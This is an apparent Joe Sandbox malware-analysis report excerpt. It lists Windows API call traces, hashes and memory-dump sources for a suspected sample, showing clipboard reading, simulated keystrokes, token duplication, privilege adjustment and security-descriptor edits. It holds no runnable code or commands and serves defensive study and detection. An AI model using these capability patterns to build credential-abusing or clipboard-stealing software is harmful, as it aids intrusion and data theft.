                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                              • String ID:
                                              • API String ID: 3667716007-0
                                              • Opcode ID: 576f4b5d587a639934a0e657dcb6b60546411ace24f454f07c74d8d3caed58aa
                                              • Instruction ID: 877eef3d9295319a9e8821ba8d2af7f0927beb9f3d35197134066de52566c724
                                              • Opcode Fuzzy Hash: 576f4b5d587a639934a0e657dcb6b60546411ace24f454f07c74d8d3caed58aa
                                              • Instruction Fuzzy Hash: C1E0862230424806CB08BB75A85357DB759DBE6351F40957EF15A631A3EF25498A4272
                                              APIs
                                              • CreateFileW.KERNELBASE(00000000,00000000,?,00DB0704,?,?,00000000,?,00DB0704,00000000,0000000C), ref: 00DB03B7
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 9e247a467790ae1cabc5d06c3cd021d99ac70a8b9e85c10e109db1e9c7f47101
                                              • Instruction ID: 206029e4bd219b0a3caa76f2a094b7108fb2c6bc57e44eb7dd252a0a5274b61e
                                              • Opcode Fuzzy Hash: 9e247a467790ae1cabc5d06c3cd021d99ac70a8b9e85c10e109db1e9c7f47101
                                              • Instruction Fuzzy Hash: 2AD06C3204010DBFDF028F85DD06EDA3BAAFB48714F114100BE5866020C732E861AB90
                                              APIs
                                              • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00D71CBC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: InfoParametersSystem
                                              • String ID:
                                              • API String ID: 3098949447-0
                                              • Opcode ID: a2b13c3aaf896d0cbd4ca17daeb107afdbc0e56c94f7d2ee5824b7568bd0d05b
                                              • Instruction ID: 2a26624c32a19faa042157f57823a87ad5a435a59ecc58265b462b7569599fce
                                              • Opcode Fuzzy Hash: a2b13c3aaf896d0cbd4ca17daeb107afdbc0e56c94f7d2ee5824b7568bd0d05b
                                              • Instruction Fuzzy Hash: 1EC0923E280304AFF6148B82BC4AF1077A4A34DF00F548001F709B95E3C3A228AAEA51
                                              APIs
                                              • GetTempPathW.KERNEL32(00000104,?), ref: 00DCD8E9
                                                • Part of subcall function 00D733A7: _wcslen.LIBCMT ref: 00D733AB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: PathTemp_wcslen
                                              • String ID:
                                              • API String ID: 1974555822-0
                                              • Opcode ID: fb46aada2bbbffdfb6114dbd85055c46f6221057075c93da571957ce0f73282f
                                              • Instruction ID: 3d6dbe54ee0ba5dd465a2aa5cbf26d68c6d7556460cb98429dc727afd2741388
                                              • Opcode Fuzzy Hash: fb46aada2bbbffdfb6114dbd85055c46f6221057075c93da571957ce0f73282f
                                              • Instruction Fuzzy Hash: 1BC04C7450105A9FDB90AB90CCC9BA9B324EF00301F108095F149510509E709A899B21
                                              APIs
                                                • Part of subcall function 00D75745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00D7949C,?,00008000), ref: 00D75773
                                              • GetLastError.KERNEL32(00000002,00000000), ref: 00DE76DE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CreateErrorFileLast
                                              • String ID:
                                              • API String ID: 1214770103-0
                                              • Opcode ID: 220f7c75209cce8cbc065475ee57e99642ec2f066fd7d6edc8fcc719adf76b90
                                              • Instruction ID: 1b1cf66e5f74b620a0282c0fefaa93bf96d5817f57af51fdff82996c4e2b9c8c
                                              • Opcode Fuzzy Hash: 220f7c75209cce8cbc065475ee57e99642ec2f066fd7d6edc8fcc719adf76b90
                                              • Instruction Fuzzy Hash: 208180302087419FC755EF28C491A69B7E1FF89314F08855DF88A5B2A2EB70ED45CBB2
                                              APIs
                                              • Sleep.KERNELBASE(000001F4), ref: 01043521
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1797146074.0000000001041000.00000040.00000020.00020000.00000000.sdmp, Offset: 01041000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1041000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Sleep
                                              • String ID:
                                              • API String ID: 3472027048-0
                                              • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                              • Instruction ID: 6fc0154ea2530c1ca9b298a541e371c446d4e68fa45cf5736169641494f5f73c
                                              • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                              • Instruction Fuzzy Hash: 95E0BF7494010D9FDB00EFA4D54969E7BB4EF04301F1001A1FD0192281D6309A608A62
                                              APIs
                                                • Part of subcall function 00D89BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D89BB2
                                              • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?), ref: 00E0961A
                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00E0965B
                                              • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00E0969F
                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E096C9
                                              • SendMessageW.USER32 ref: 00E096F2
                                              • GetKeyState.USER32(00000011), ref: 00E0978B
                                              • GetKeyState.USER32(00000009), ref: 00E09798
                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00E097AE
                                              • GetKeyState.USER32(00000010), ref: 00E097B8
                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E097E9
                                              • SendMessageW.USER32 ref: 00E09810
                                              • SendMessageW.USER32(?,00001030,?,00E07E95), ref: 00E09918
                                              • SetCapture.USER32(?), ref: 00E0994A
                                              • ClientToScreen.USER32(?,?), ref: 00E099AF
                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00E099D6
                                              • ReleaseCapture.USER32 ref: 00E099E1
                                              • GetCursorPos.USER32(?), ref: 00E09A19
                                              • ScreenToClient.USER32(?,?), ref: 00E09A26
                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 00E09A80
                                              • SendMessageW.USER32 ref: 00E09AAE
                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00E09AEB
                                              • SendMessageW.USER32 ref: 00E09B1A
                                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00E09B3B
                                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00E09B4A
                                              • GetCursorPos.USER32(?), ref: 00E09B68
                                              • ScreenToClient.USER32(?,?), ref: 00E09B75
                                              • GetParent.USER32(?), ref: 00E09B93
                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 00E09BFA
                                              • SendMessageW.USER32 ref: 00E09C2B
                                              • ClientToScreen.USER32(?,?), ref: 00E09C84
                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00E09CB4
                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00E09CDE
                                              • SendMessageW.USER32 ref: 00E09D01
                                              • ClientToScreen.USER32(?,?), ref: 00E09D4E
                                              • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00E09D82
                                                • Part of subcall function 00D89944: GetWindowLongW.USER32(?,000000EB), ref: 00D89952
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00E09E05
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: MessageSend$ClientScreen$LongWindow$State$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease
                                              • String ID: @GUI_DRAGID$F$p#
                                              • API String ID: 1312020300-638943876
                                              • Opcode ID: d25e31c1cb3794c6af39800757546c7f219c14064d97480db30dff9f43d831be
                                              • Instruction ID: 0ebe915e217ca16e6e2607140b060296bf25044b5ea74c0d90bfd6b4a7baf4ef
                                              • Opcode Fuzzy Hash: d25e31c1cb3794c6af39800757546c7f219c14064d97480db30dff9f43d831be
                                              • Instruction Fuzzy Hash: 2842B134208201AFDB24CF24DC44EAABBE5FF89714F141619F699A72E2D732D895CF52
                                              APIs
                                              • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00E048F3
                                              • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00E04908
                                              • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00E04927
                                              • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 00E0494B
                                              • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00E0495C
                                              • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 00E0497B
                                              • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 00E049AE
                                              • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 00E049D4
                                              • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00E04A0F
                                              • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00E04A56
                                              • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00E04A7E
                                              • IsMenu.USER32(?), ref: 00E04A97
                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E04AF2
                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E04B20
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00E04B94
                                              • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00E04BE3
                                              • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00E04C82
                                              • wsprintfW.USER32 ref: 00E04CAE
                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00E04CC9
                                              • GetWindowTextW.USER32(?,00000000,00000001), ref: 00E04CF1
                                              • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00E04D13
                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00E04D33
                                              • GetWindowTextW.USER32(?,00000000,00000001), ref: 00E04D5A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                              • String ID: %d/%02d/%02d
                                              • API String ID: 4054740463-328681919
                                              • Opcode ID: 18ffccdbaa00e556433a8351ce6f48668fc4c4ec8856de0b0626fbb7da6e78b6
                                              • Instruction ID: 5c4aaee6e544ad5789e746dbf16eadaf916a140b261abebdd8c1ee72493920fb
                                              • Opcode Fuzzy Hash: 18ffccdbaa00e556433a8351ce6f48668fc4c4ec8856de0b0626fbb7da6e78b6
                                              • Instruction Fuzzy Hash: 761200F1600205AFEB259F24CD49FAE7BB8EF85704F105229F615FA1E0DB749A81CB60
                                              APIs
                                              • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00D8F998
                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00DCF474
                                              • IsIconic.USER32(00000000), ref: 00DCF47D
                                              • ShowWindow.USER32(00000000,00000009), ref: 00DCF48A
                                              • SetForegroundWindow.USER32(00000000), ref: 00DCF494
                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00DCF4AA
                                              • GetCurrentThreadId.KERNEL32 ref: 00DCF4B1
                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00DCF4BD
                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 00DCF4CE
                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 00DCF4D6
                                              • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00DCF4DE
                                              • SetForegroundWindow.USER32(00000000), ref: 00DCF4E1
                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DCF4F6
                                              • keybd_event.USER32(00000012,00000000), ref: 00DCF501
                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DCF50B
                                              • keybd_event.USER32(00000012,00000000), ref: 00DCF510
                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DCF519
                                              • keybd_event.USER32(00000012,00000000), ref: 00DCF51E
                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DCF528
                                              • keybd_event.USER32(00000012,00000000), ref: 00DCF52D
                                              • SetForegroundWindow.USER32(00000000), ref: 00DCF530
                                              • AttachThreadInput.USER32(?,000000FF,00000000), ref: 00DCF557
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                              • String ID: Shell_TrayWnd
                                              • API String ID: 4125248594-2988720461
                                              • Opcode ID: 4fd8ef18237793e6bd8a0ade4893e0f9b021d516ee4459055bcf7ada4364814d
                                              • Instruction ID: f551485c64166c1ed86fb07bdfe64414333f816b27d2a2af46cc12e94bbc858d
                                              • Opcode Fuzzy Hash: 4fd8ef18237793e6bd8a0ade4893e0f9b021d516ee4459055bcf7ada4364814d
                                              • Instruction Fuzzy Hash: C1316571A402187FEB206BB69C49FBF7E6DEB44B50F24016AF601F71D1C6B29D40AA71
                                              APIs
                                                • Part of subcall function 00DD16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00DD170D
                                                • Part of subcall function 00DD16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00DD173A
                                                • Part of subcall function 00DD16C3: GetLastError.KERNEL32 ref: 00DD174A
                                              • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00DD1286
                                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00DD12A8
                                              • CloseHandle.KERNEL32(?), ref: 00DD12B9
                                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00DD12D1
                                              • GetProcessWindowStation.USER32 ref: 00DD12EA
                                              • SetProcessWindowStation.USER32(00000000), ref: 00DD12F4
                                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00DD1310
                                                • Part of subcall function 00DD10BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00DD11FC), ref: 00DD10D4
                                                • Part of subcall function 00DD10BF: CloseHandle.KERNEL32(?,?,00DD11FC), ref: 00DD10E9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                              • String ID: $default$winsta0$Z
                                              • API String ID: 22674027-1808616255
                                              • Opcode ID: 3e83e02a2b1e80d433c167f2d8c1dd9b4f4a75bb589e01aadb0bdc7ac6d12360
                                              • Instruction ID: 814d9808cc3074dde86d4c95a641df6d1c7c11652b54c2296654471fd6f049e1
                                              • Opcode Fuzzy Hash: 3e83e02a2b1e80d433c167f2d8c1dd9b4f4a75bb589e01aadb0bdc7ac6d12360
                                              • Instruction Fuzzy Hash: C7817B75900209BFDF219FA5DC49BEE7BB9EF04704F18422AF910B62A0D7769985CB70
                                              APIs
                                                • Part of subcall function 00DD10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00DD1114
                                                • Part of subcall function 00DD10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00DD0B9B,?,?,?), ref: 00DD1120
                                                • Part of subcall function 00DD10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00DD0B9B,?,?,?), ref: 00DD112F
                                                • Part of subcall function 00DD10F9: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00DD1136
                                                • Part of subcall function 00DD10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00DD114D
                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00DD0BCC
                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00DD0C00
                                              • GetLengthSid.ADVAPI32(?), ref: 00DD0C17
                                              • GetAce.ADVAPI32(?,00000000,?), ref: 00DD0C51
                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00DD0C6D
                                              • GetLengthSid.ADVAPI32(?), ref: 00DD0C84
                                              • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00DD0C8C
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 00DD0C93
                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00DD0CB4
                                              • CopySid.ADVAPI32(00000000), ref: 00DD0CBB
                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00DD0CEA
                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00DD0D0C
                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00DD0D1E
                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DD0D45
                                              • HeapFree.KERNEL32(00000000), ref: 00DD0D4C
                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DD0D55
                                              • HeapFree.KERNEL32(00000000), ref: 00DD0D5C
                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DD0D65
                                              • HeapFree.KERNEL32(00000000), ref: 00DD0D6C
                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00DD0D78
                                              • HeapFree.KERNEL32(00000000), ref: 00DD0D7F
                                                • Part of subcall function 00DD1193: GetProcessHeap.KERNEL32(00000008,00DD0BB1,?,00000000,?,00DD0BB1,?), ref: 00DD11A1
                                                • Part of subcall function 00DD1193: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00DD11A8
                                                • Part of subcall function 00DD1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00DD0BB1,?), ref: 00DD11B7
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Heap$Process$Security$Free$AllocateDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                              • String ID:
                                              • API String ID: 4042927181-0
                                              • Opcode ID: a7f9334530995c963768f7cfa647bf5e0fc39d6a095ba25edbd3b0a21f7132e2
                                              • Instruction ID: 30358d291a78cd4a28cfb2ffd5f8e58d179efe371718531698e72ddaf5fc45e3
                                              • Opcode Fuzzy Hash: a7f9334530995c963768f7cfa647bf5e0fc39d6a095ba25edbd3b0a21f7132e2
                                              • Instruction Fuzzy Hash: 6C71487690020AAFDF109FA5DC48BEEBBBDEF45300F184616E914A7291D771AA49CB70
                                              APIs
                                              • OpenClipboard.USER32(00E0CC08), ref: 00DEEB29
                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 00DEEB37
                                              • GetClipboardData.USER32(0000000D), ref: 00DEEB43
                                              • CloseClipboard.USER32 ref: 00DEEB4F
                                              • GlobalLock.KERNEL32(00000000), ref: 00DEEB87
                                              • CloseClipboard.USER32 ref: 00DEEB91
                                              • GlobalUnlock.KERNEL32(00000000), ref: 00DEEBBC
                                              • IsClipboardFormatAvailable.USER32(00000001), ref: 00DEEBC9
                                              • GetClipboardData.USER32(00000001), ref: 00DEEBD1
                                              • GlobalLock.KERNEL32(00000000), ref: 00DEEBE2
                                              • GlobalUnlock.KERNEL32(00000000), ref: 00DEEC22
                                              • IsClipboardFormatAvailable.USER32(0000000F), ref: 00DEEC38
                                              • GetClipboardData.USER32(0000000F), ref: 00DEEC44
                                              • GlobalLock.KERNEL32(00000000), ref: 00DEEC55
                                              • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00DEEC77
                                              • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00DEEC94
                                              • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00DEECD2
                                              • GlobalUnlock.KERNEL32(00000000), ref: 00DEECF3
                                              • CountClipboardFormats.USER32 ref: 00DEED14
                                              • CloseClipboard.USER32 ref: 00DEED59
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                              • String ID:
                                              • API String ID: 420908878-0
                                              • Opcode ID: a422bcf687ab154a1df0df9660f5c28dafd7a03e55ad147ca9bab72e93a779e6
                                              • Instruction ID: ea206b3fffdb9920621f0301a96e29569fdb36519715931a687c37f5a1173a43
                                              • Opcode Fuzzy Hash: a422bcf687ab154a1df0df9660f5c28dafd7a03e55ad147ca9bab72e93a779e6
